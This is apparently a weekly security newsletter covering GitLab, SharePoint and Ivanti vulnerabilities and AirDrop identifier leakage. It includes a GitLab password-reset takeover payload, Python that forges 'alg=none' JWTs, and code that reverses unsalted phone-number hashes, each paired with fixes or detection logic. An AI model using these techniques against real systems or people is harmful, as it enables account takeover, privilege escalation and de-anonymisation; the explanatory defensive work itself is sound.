CCTR.3.JAN.24

GitLab bugs, SharePoint bugs, Ivanti

Monday morning Cyber coffee read CCTR.3.JAN.24.

All your Gits belong to someone else.

If you’re running self-managed GitLab you should patch for CVE-2023-7028 (CVSS 10.0). The password-reset flow let the reset email be delivered to an unverified, attacker-controlled address, which means account takeover unless the account has 2FA enabled (with 2FA the password can still be reset, but the attacker cannot complete the login). The PoC is a single POST to /users/password carrying the email parameter twice, as an array:

user[email][]=validemail&user[email][]=attackeremail

The following versions are affected (fixed in 16.7.2, 16.6.4, 16.5.6, 16.4.5, 16.3.7, 16.2.9 and 16.1.6):

  • 16.1 to 16.1.5

  • 16.2 to 16.2.8

  • 16.3 to 16.3.6

  • 16.4 to 16.4.4

  • 16.5 to 16.5.5

  • 16.6 to 16.6.3

  • 16.7 to 16.7.1

Ref https://twitter.com/Dinosn/status/1745787096042807356

Ref https://about.gitlab.com/releases/2024/01/11/critical-security-release-gitlab-16-7-2-released/
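Why does a repeated `user[email][]` parameter matter? Rails-style form parsing turns a trailing `[]` into an array, and the pre-fix reset handler used that array both to find the account and as the recipient list. The block below is an added example, not GitLab's code: a minimal re-implementation of the nested-parameter parsing (hypothetical, not Rack itself), the vulnerable and fixed reset logic side by side, and a hunt over constructed log lines in the shape of gitlab-rails/production_json.log (the indicator GitLab's advisory points at: a POST to /users/password whose user.email value is a JSON array with more than one address). The account store, addresses and log lines are all made up.

```python
import json
from urllib.parse import parse_qsl


def parse_nested_query(body: str) -> dict:
    """Minimal re-implementation of Rack-style nested form parsing (not Rack itself).

    'user[email][]=a&user[email][]=b' -> {'user': {'email': ['a', 'b']}}
    'user[email]=a'                  -> {'user': {'email': 'a'}}
    The trailing '[]' is what turns a scalar into a list: that is the whole PoC.
    """
    params: dict = {}
    for raw_key, value in parse_qsl(body, keep_blank_values=True):
        keys = raw_key.replace("]", "").split("[")   # 'user[email][]' -> ['user', 'email', '']
        node = params
        for key, nxt in zip(keys, keys[1:]):
            if nxt == "":                            # next segment is '[]': append to a list
                node.setdefault(key, []).append(value)
                break
            node = node.setdefault(key, {})
        else:
            node[keys[-1]] = value
    return params


# Constructed account store (hypothetical): verified address -> account record.
ACCOUNTS = {"victim@example.com": {"username": "victim", "email": "victim@example.com"}}


def reset_recipients_vulnerable(params: dict) -> list:
    """Pre-fix behaviour: find an account matching *any* submitted address, then send
    the reset link to *every* submitted address. The attacker's address rides along."""
    emails = params["user"]["email"]
    if isinstance(emails, str):
        emails = [emails]
    if not any(e in ACCOUNTS for e in emails):
        return []
    return list(emails)


def reset_recipients_fixed(params: dict) -> list:
    """Fixed behaviour: the parameter must be one string, and the link goes only to the
    verified address stored on the account, never to whatever the client supplied."""
    email = params["user"]["email"]
    if not isinstance(email, str):
        raise ValueError("user[email] must be a single value")
    account = ACCOUNTS.get(email)
    return [account["email"]] if account else []


def suspicious_reset_requests(log_lines) -> list:
    """Hunt in production_json.log-shaped entries: POST /users/password whose 'user'
    param carries an email *array* with more than one entry."""
    hits = []
    for line in log_lines:
        entry = json.loads(line)
        if entry.get("method") != "POST" or entry.get("path") != "/users/password":
            continue
        for param in entry.get("params", []):
            value = param.get("value")
            if param.get("key") != "user" or not isinstance(value, dict):
                continue
            email = value.get("email")
            if isinstance(email, list) and len(email) > 1:
                hits.append((entry.get("remote_ip"), email))
    return hits


# Constructed log lines in the production_json.log shape (not real traffic).
SAMPLE_LOG = [
    '{"method":"POST","path":"/users/password","remote_ip":"203.0.113.5",'
    '"params":[{"key":"user","value":{"email":["victim@example.com","attacker@evil.test"]}}]}',
    '{"method":"POST","path":"/users/password","remote_ip":"198.51.100.7",'
    '"params":[{"key":"user","value":{"email":"victim@example.com"}}]}',
    '{"method":"GET","path":"/users/sign_in","remote_ip":"198.51.100.7","params":[]}',
]


if __name__ == "__main__":
    poc = "user[email][]=victim@example.com&user[email][]=attacker@evil.test"
    params = parse_nested_query(poc)
    print("vulnerable sends to:", reset_recipients_vulnerable(params))
    try:
        reset_recipients_fixed(params)
    except ValueError as exc:
        print("fixed rejects:", exc)
    print("log hits:", suspicious_reset_requests(SAMPLE_LOG))
```

The fix is two-fold, and both halves matter: reject a type the endpoint never expects (an array where a string belongs), and never use client input as the delivery address for a secret. A single legitimate-looking address in the array is enough to pass the account lookup, so the hunt keys on the array shape rather than on the addresses themselves.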

Escalation SharePoint

CISA has added CVE-2023-29357 (CVSS 9.8), a Microsoft SharePoint Server privilege escalation vulnerability, to its Known Exploited Vulnerabilities Catalog based on evidence of active exploitation. It lets a threat actor present forged JWTs (JSON Web Tokens) to bypass authentication and gain administrator privileges. If you want to understand why a JWT verifier that trusts the token's own header is dangerous, check this out from PentesterLab:

https://www.linkedin.com/posts/pentesterlab_jwt-none-algorithm-activity-7152056195535503360-KL4X/

Ref https://www.cisa.gov/news-events/alerts/2024/01/10/cisa-adds-one-known-exploited-vulnerability-catalog
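The bug class behind "forged JWTs" is worth seeing in code. The block below is an added example, not SharePoint code and not PentesterLab's material: a minimal HS256 signer, an attacker-forged token whose header claims alg=none with an empty signature, a naive verifier that believes the header (and so accepts the forgery), and a strict verifier that only honours a server-side allow-list of algorithms. The key, claims and function names are made up; it uses only the standard library.

```python
import base64
import hashlib
import hmac
import json


def b64url(data: bytes) -> str:
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode()


def b64url_decode(s: str) -> bytes:
    return base64.urlsafe_b64decode(s + "=" * (-len(s) % 4))


def _segment(obj: dict) -> str:
    return b64url(json.dumps(obj, separators=(",", ":")).encode())


def sign_hs256(claims: dict, key: bytes) -> str:
    """Legitimate token: header.payload signed with HMAC-SHA256 under the server key."""
    header, payload = _segment({"alg": "HS256", "typ": "JWT"}), _segment(claims)
    sig = hmac.new(key, f"{header}.{payload}".encode(), hashlib.sha256).digest()
    return f"{header}.{payload}.{b64url(sig)}"


def forge_none(claims: dict) -> str:
    """What an attacker sends: header says alg=none, signature segment left empty.
    No key is needed; the claims are whatever the attacker wants them to be."""
    header, payload = _segment({"alg": "none", "typ": "JWT"}), _segment(claims)
    return f"{header}.{payload}."


def verify_naive(token: str, key: bytes):
    """Vulnerable: trusts the header's alg field. 'none' means 'skip the check'."""
    h, p, s = token.split(".")
    header = json.loads(b64url_decode(h))
    if header.get("alg") == "none":
        return json.loads(b64url_decode(p))          # accepted with no signature at all
    if header.get("alg") == "HS256":
        expected = hmac.new(key, f"{h}.{p}".encode(), hashlib.sha256).digest()
        if hmac.compare_digest(expected, b64url_decode(s)):
            return json.loads(b64url_decode(p))
    return None


def verify_strict(token: str, key: bytes, allowed_algs=("HS256",)):
    """Fixed: the server decides which algorithms are acceptable. The header is only
    consulted to confirm it matches that allow-list; 'none' can never be on it."""
    parts = token.split(".")
    if len(parts) != 3:
        return None
    h, p, s = parts
    header = json.loads(b64url_decode(h))
    alg = header.get("alg")
    if alg not in allowed_algs or alg == "none":
        return None
    expected = hmac.new(key, f"{h}.{p}".encode(), hashlib.sha256).digest()
    if not hmac.compare_digest(expected, b64url_decode(s)):
        return None
    return json.loads(b64url_decode(p))


if __name__ == "__main__":
    KEY = b"server-secret-never-shared"            # hypothetical server key
    forged = forge_none({"sub": "attacker", "roles": ["admin"]})
    print("naive verifier accepts forgery:", verify_naive(forged, KEY))
    print("strict verifier rejects forgery:", verify_strict(forged, KEY))
    print("strict verifier accepts real token:", verify_strict(sign_hs256({"sub": "alice"}, KEY), KEY))
```

The practical rule for any JWT consumer: pin the algorithm (and key) on the server side and treat the header as an untrusted claim to be checked against that pin, never as an instruction. The same pinning defeats the related trick of downgrading an RS256 verifier to HS256 with the public key as the HMAC secret.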

Ivanti Connect "Not" Secure

The ACSC urges organisations running or administering Ivanti Connect Secure (ICS) and Ivanti Policy Secure (IPS) to apply Ivanti's mitigation now and the patches as they are released. ICS (formerly Pulse Connect Secure) and IPS gateways contain CVE-2023-46805 (CVSS 8.2), an authentication bypass in the web component that lets an attacker reach restricted resources by bypassing control checks. Chained with CVE-2024-21887 (CVSS 9.1), a command injection vulnerability, it gives an unauthenticated attacker arbitrary command execution on the appliance. Ivanti is aware of active exploitation of both vulnerabilities, so running Ivanti's Integrity Checker Tool on internet-exposed appliances is warranted as well as mitigating.

Ref https://www.cyber.gov.au/about-us/view-all-content/alerts-and-advisories/critical-vulnerabilities-ivanti-connect-secure-ics-and-ivanti-policy-secure-ips

Ref https://forums.ivanti.com/s/article/CVE-2023-46805-Authentication-Bypass-CVE-2024-21887-Command-Injection-for-Ivanti-Connect-Secure-and-Ivanti-Policy-Secure-Gateways?language=en_US

China Vs AirDrop

China hacking / cracking AirDrop? Nah. A more accurate description is shrinking the problem space until brute force is trivial. AirDrop identifies a sender by exchanging SHA-256 hashes of their phone number and email address, and those hashes are unsalted. The space of valid phone numbers in one country is small (on the order of 10^9 to 10^10), so the hash of every possible number can be precomputed into a lookup table of at most a few terabytes (a plain hash-to-number table, or a smaller rainbow table), and recovering the sender from a captured hash is then a single lookup. Email addresses can't be enumerated the same way, but their hashes can be matched against lists of known addresses. Currently there is no effective way to prevent this leakage of your phone number and email address short of turning AirDrop off.

Ref https://twitter.com/lauriewired/status/1745871465592094970

Ref https://www.scmp.com/news/china/politics/article/3247771/china-forensic-firm-cracks-apples-airdrop-help-beijing-police-track-senders
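To make the "small problem space" argument concrete, the block below is an added example, not code from either linked article: it enumerates a constructed Australian mobile range, builds the hash-to-number table, reverses a captured hash by lookup, shows that on-demand brute force works just as well for a single hash, and estimates the storage a full 10^10-number table would need. The assumption that the number is hashed as a plain E.164 string like "+61412345678" is mine; AirDrop's real normalisation may differ, and only the size of the search space matters for the point.

```python
import hashlib
import itertools


def hash_identifier(identifier: str) -> str:
    """Unsalted SHA-256 of an identifier, hex-encoded. Assumption (not from the page):
    the phone number is hashed as a plain E.164 string such as '+61412345678'."""
    return hashlib.sha256(identifier.encode()).hexdigest()


def enumerate_numbers(prefix: str, free_digits: int):
    """Every number starting with `prefix` followed by `free_digits` decimal digits."""
    for tail in itertools.product("0123456789", repeat=free_digits):
        yield prefix + "".join(tail)


def build_lookup_table(prefix: str, free_digits: int) -> dict:
    """Precompute hash -> number for the whole range. A rainbow table would trade
    some lookup time for less storage; at this size a plain dictionary is fine."""
    return {hash_identifier(n): n for n in enumerate_numbers(prefix, free_digits)}


def reverse_hash(table: dict, digest: str):
    """Recover the number behind a captured hash with one dictionary lookup."""
    return table.get(digest)


def brute_force(digest: str, prefix: str, free_digits: int):
    """No precomputation at all: hash candidates until one matches. For a single
    captured hash this is cheap enough that the table is a convenience, not a need."""
    for n in enumerate_numbers(prefix, free_digits):
        if hash_identifier(n) == digest:
            return n
    return None


def table_size_gib(number_space: int, bytes_per_entry: int = 32 + 12) -> float:
    """Rough storage for a full hash->number table: 32-byte digest plus a 12-byte number."""
    return number_space * bytes_per_entry / 2**30


if __name__ == "__main__":
    # Constructed range: +61 4123 xxxxx, i.e. 100,000 candidate numbers.
    table = build_lookup_table("+614123", 5)
    captured = hash_identifier("+61412345678")   # what a receiver's device would have logged
    print("lookup:", reverse_hash(table, captured))
    print("brute force:", brute_force(captured, "+614123", 5))
    print(f"full table for 10^10 numbers: about {table_size_gib(10**10):.0f} GiB")
```

The point the example makes is that salting would not fix this on its own either: the receiver has to compute the same hash to match a sender against its contacts, so any salt would have to be shared, and a shared salt is just a longer input to enumerate. Defeating the lookup needs a protocol change (for example, a private set intersection) rather than a different hash.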
